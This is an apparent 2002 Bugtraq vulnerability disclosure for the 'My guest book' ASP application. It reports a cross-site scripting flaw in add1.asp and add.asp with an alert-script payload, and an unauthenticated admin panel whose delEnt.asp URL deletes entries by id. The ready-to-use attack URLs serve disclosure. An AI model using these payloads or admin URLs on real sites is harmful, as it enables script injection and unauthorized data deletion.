Vulnerability in my guest book

From: Over_G (overg@mail.ru)
Date: 03/27/02

  • Next message: sir.mordred@hushmail.com: "@(#)Mordred Labs advisory - PHP for Win32: buffer overflow in openlog() function"
    Date: Wed, 27 Mar 2002 18:07:27 +0300
    From: Over_G <overg@mail.ru>
    To: vuln@security.nnov.ru, bugtraq@securityfocus.com
    
    

    Product: My guest book
    Version: ?
    OffSite: ?
    Problem: CSS and unauthorized access in admin panel
    --------------------------------------------------------------

    1)Cross Site scripting

    http://[target]/myguestBk/add1.asp?name=Name&subject=Subj&email=M@IL&message=<scr*pt>alert ("Test!")</scr*pt>

    Or open http://[target]/myguestBk/add.asp and write in "Message" field:
    <scr*pt>alert ("Test!")</scr*pt> and press "Post Message".

    2)Unauthorized access in admin panel

    http://[target]/myguestBk/admin/index.asp
    Delete news:
    http://[target]/myguestBk/admin/delEnt.asp?id=NEWSNUMBER
    with NEWSNUMBER - news number in database.

    Contacts: www.overg.com www.dwcgr0up.com
    irc.zaingandol.org #DWC
    ogprog@ukr.net

    Best regards, Over G[DWC Gr0up]


  • Next message: sir.mordred@hushmail.com: "@(#)Mordred Labs advisory - PHP for Win32: buffer overflow in openlog() function"